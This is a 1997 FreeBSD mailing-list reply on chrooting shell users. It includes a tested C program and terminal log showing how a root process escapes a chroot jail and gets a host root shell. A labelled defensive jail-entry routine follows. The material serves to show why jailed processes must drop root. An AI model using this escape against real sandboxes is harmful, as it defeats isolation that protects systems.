Date: Thu, 29 May 1997 17:40:23 -0700
From: Julian Elischer <julian@whistle.com>
To: Warner Losh <imp@village.org>
Cc: Terry Lambert <terry@lambert.org>, dec@phoenix.its.rpi.edu, peter@grendel.IAEhv.nl, mrcpu@cdsnet.net, hackers@FreeBSD.ORG
Subject: Re: Correct way to chroot for shell account users?
Message-ID: <338E21F7.446B9B3D@whistle.com>
References: <199705291456.HAA03526@phaeton.artisoft.com> <E0wX6vy-0002fp-00@rover.village.org>

Warner Losh wrote:
>
In fact here is a program to give you a root shell out of the
chroot environ..
I just tested it
it works
> Michael Smith posted the program to climb out of the jail here a few
> months ago. This isn't theoretical, but it works. It was something
> along the lines of the following. You can find it in the archives.
>
>
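#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>

int
main(int argc, char **argv)
{
	mkdir("foo", 0755);	/* mkdir(2) takes a mode argument */
	chroot("foo");		/* root moves to foo; cwd stays where it was */
	chdir("..");
	chdir("..");
	chdir("..");
	chdir("..");
	chdir("..");
	chdir("..");
	chdir("..");
	chdir("..");
	chdir("..");
	chdir("..");
	chdir("..");
	chdir("..");
	chdir("..");
	chdir("..");
	chdir("..");
	chroot(".");
	execl("/bin/sh", "sh", (char *)NULL);
	return 1;		/* only reached if execl() fails */
}
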
built1% cd /
built1% df .
Filesystem 1K-blocks Used Avail Capacity Mounted on
/dev/sd0a 38991 24797 11075 69% /
built1% sudo chroot /work/julian/2.2R2
# df .
Filesystem 1K-blocks Used Avail Capacity Mounted on
/dev/sd1s1f 2033631 1741315 129626 93% /work
# cd /tmp
# cat >xx.c
[type in file above]
# make xx
cc -O xx.c -o xx
# exec ./xx
# df .
Filesystem 1K-blocks Used Avail Capacity Mounted on
/dev/sd0a 38991 24797 11075 69% /
# exit
built1%
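
The program above needs two things the jail left in place: the process is still root, so chroot() can be called again, and after that call its working directory lies outside the new root. The following is an added example, not code from this message or from FreeBSD: a jail-entry routine for a daemon that closes both, plus a check that the working directory is still beneath a given root. The names enter_jail and cwd_is_beneath and the caller-supplied uid/gid are assumptions.

```c
#define _DEFAULT_SOURCE            /* chroot()/setgroups() prototypes on glibc */
#include <fcntl.h>
#include <grp.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Walk ".." from the current directory. Returns 1 if `root` is met on the way
 * up, 0 if the top of the visible tree is reached first, -1 on error.
 * The original working directory is restored before returning. */
int cwd_is_beneath(const char *root)
{
    struct stat want, cur, up;
    int result = -1, saved = open(".", O_RDONLY);
    if (saved < 0) return -1;
    if (stat(root, &want) < 0) goto out;
    for (;;) {
        if (stat(".", &cur) < 0 || stat("..", &up) < 0) goto out;
        if (cur.st_dev == want.st_dev && cur.st_ino == want.st_ino) { result = 1; break; }
        if (up.st_dev == cur.st_dev && up.st_ino == cur.st_ino) { result = 0; break; }
        if (chdir("..") < 0) goto out;
    }
out:
    if (fchdir(saved) < 0) result = -1;
    close(saved);                  /* never carry a directory fd into a jail */
    return result;
}

/* Enter `dir` as a jail and give up root for good. Order matters: move the
 * working directory inside first, change root, then drop groups, gid, uid. */
int enter_jail(const char *dir, uid_t uid, gid_t gid)
{
    if (uid == 0 || gid == 0) return -1;        /* a root process can re-chroot */
    if (chdir(dir) < 0 || chroot(".") < 0 || chdir("/") < 0) return -1;
    if (cwd_is_beneath("/") != 1) return -1;    /* cwd must be inside new root */
    if (setgroups(1, &gid) < 0 || setgid(gid) < 0 || setuid(uid) < 0) return -1;
    if (setuid(0) == 0) return -1;              /* root must not be regainable */
    return 0;
}

int main(void)
{
    printf("cwd beneath /: %d\n", cwd_is_beneath("/"));
    return 0;
}
```

enter_jail must be called as root before any untrusted code runs; once it returns 0 the process can no longer call chroot().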
